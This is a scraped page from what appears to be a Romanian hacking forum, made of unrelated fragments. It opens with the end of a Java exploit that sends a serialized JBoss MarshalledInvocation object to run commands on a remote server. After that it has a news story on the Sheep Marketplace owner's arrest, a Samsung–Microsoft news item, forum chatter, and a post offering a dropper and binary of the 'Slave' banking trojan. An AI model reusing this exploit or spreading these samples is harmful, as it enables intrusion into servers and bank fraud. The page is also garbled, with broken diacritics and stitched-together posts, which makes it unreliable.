(HttpURLConnection) server.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setDoInput(true); conn.setUseCaches(false); conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); conn.setRequestProperty("Connection", "keep-alive"); conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); wr.writeObject(payload); System.out.println("\n--[*] MarshalledInvocation object serialized"); System.out.println("\n--[*] Sending payload..."); wr.flush(); wr.close(); //Get the response InputStream is = conn.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is)); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); } rd.close(); if (response.indexOf("Script Name") != -1) { System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); } else { System.out.println("\n--[!] An invocation error occured..."); } } catch (ConnectException cex) { System.out.println("\n--[!] A connection error occured..."); } catch (IOException ex) { ex.printStackTrace(); } } /* * Raw dump of generic Java Objects */ static String dump(Object o) { StringBuffer buffer = new StringBuffer(); Class oClass = o.getClass(); if (oClass.isArray()) { buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) { if (i > 0) { buffer.append(",\n"); } Object value = Array.get(o, i); buffer.append(value.getClass().isArray() ? dump(value) : value); } buffer.append("]"); } else { buffer.append("{"); while (oClass != null) { Field[] fields = oClass.getDeclaredFields(); for (int i = 0; i < fields.length; i++) { if (buffer.length() > 1) { buffer.append(",\n"); } fields[i].setAccessible(true); buffer.append(fields[i].getName()); buffer.append("="); try { Object value = fields[i].get(o); if (value != null) { buffer.append(value.getClass().isArray() ? dump(value) : value); } } catch (IllegalAccessException e) { } } oClass = oClass.getSuperclass(); } buffer.append("}"); } return buffer.toString(); } } Source

Thomas Ji?ikovský, an alleged Owner of one of the most popular Darknet website ‘Sheep Marketplace,’ has been arrested after laundering around $40 Million, making it one of the biggest exit scams in Darknet history. After the arrest of Silk Road owner 'Ross Ulbricht' in 2013 -- Sheep Marketplace became the next famous anonymous underground marketplace among Black Market customers for selling illicit products, especially drugs. But only after few weeks, Sheep Marketplace was suddenly disappeared and was taken offline by its owner, who had been suspected of stealing $40 million worth of Bitcoins at the time when Bitcoin market value was at the peak. Shortly after this Bitcoin Scam, a Darknet commentator ‘Gwern Branwen’ doxed the owner, and the suspect was identified -- Thomas Ji?ikovský as the owner of the black market website. Unfortunately, Ji?ikovský forgot to hide his identity and residential address from the Internet, which was exposed by his Facebook page. However, immediately after his identity exposure, Ji?ikovský denied his involvement in the Darknet Sheep Marketplace. While Investigating for stolen money from online market, Czech police noticed a suspicious young programmer who attempted to buy a luxury home worth 8.7 Million Czech Koruna ($345,000 USD) in Lusatia, a region in the Czech Republic, under his grandfather’s name. Additional investigation revealed that in January last year, a new bank account of 26-years old Eva Bartošová received a huge payment of almost 900,000 Crowns from a foreign Bitcoin Money Exchange company. However, the young woman was unable to justify the source of the money. According to Czech media, ‘Eva Bartošová’ is ‘Thomas Ji?ikovský’ wife, who helped him to transfer the stolen money to her freshly created bank account. Czech’s Economic Police wing investigated into Ji?ikovský's money and found that the house had been purchased entirely using Bitcoin. Two weeks back, another largest Deep Web drugs marketplace ‘Evolution’ disappeared suddenly with rumors circulating that its owners may have scammed its massive user base and stole $12 Million in Bitcoin Source

@Kalashnikov. lipsesc mai multi de la Retired Administrators. ( probabil nu au vrut sa apara )

Samsung a anun?at azi c? î?i extinde parteneriatul cu Microsoft ?i c? inten?ioneaz? ca o parte din serviciile ?i aplica?iile semnate Microsoft s? fie preinstalate pe noile device-uri cu Android ale companiei. Concomitent, Samsung va colabora cu Microsoft pe partea de dezvoltare a serviciului de securitate KNOX pentru noul Microsoft Office 365. Un alt beneficiu, se refer? la faptul c? cei care de?in un model Samsung Galaxy S6 ori Samsung Galaxy S6 edge vor primi 100 GB de spa?iu de stocare în cloud, pe Microsoft OneDrive, gratuit, timp de doi ani. Iar cei care vor cump?ra un device Samsung prin canalele de vânzare business-to-business vor primi acces la trei versiuni de Office 365 – Business, Business Premium ?i Enterprise, la care se adaug? solu?ia de securitate KNOX. Colaborarea dintre cele dou? companii a f?cut un pas înainte cu prilejul târgului Mobile World Congress, când Samsung a anun?at c? noile smartphone-uri Samsung Galaxy S6 ?i Galaxy S6 edge vor include aplica?iile OneNote, OneDrive ?i Skype. Mai mult, compania a f?cut cunoscut c? în prima jum?tate a anului, programele Microsoft Word, Excel, PowerPoint, OneNote, OneDrive ?i Skype urmeaz? s? fie preinstalate pe o serie de tablete cu Android. Source

GirlShare - Download WnALA.txt

@luca123 cu placere dar nu sunt administrator

Salut si bine ai venit la noi, sper sa ramai cat mai mult printre noi si sa inveti cat mai multe, din moment ce ti-ai facut cont aici e clar ca esti pasionat de ceva din domeniul IT asa ca multa bafta. Off:// Mesaj catre cei ce te-au jignit. -Ce ati rezolvat daca ati injurat omul? Asa a vrut el sa salute, nu e obligat sa urmeze un anumit tipar, terminati. @tricks nu baga in seama pe toti care te ataca.

so guys from s21sec found some new banker. S21sec Security Blog: New banking trojan 'Slave' hitting Polish Banks in attach dropper + unpacked bin Download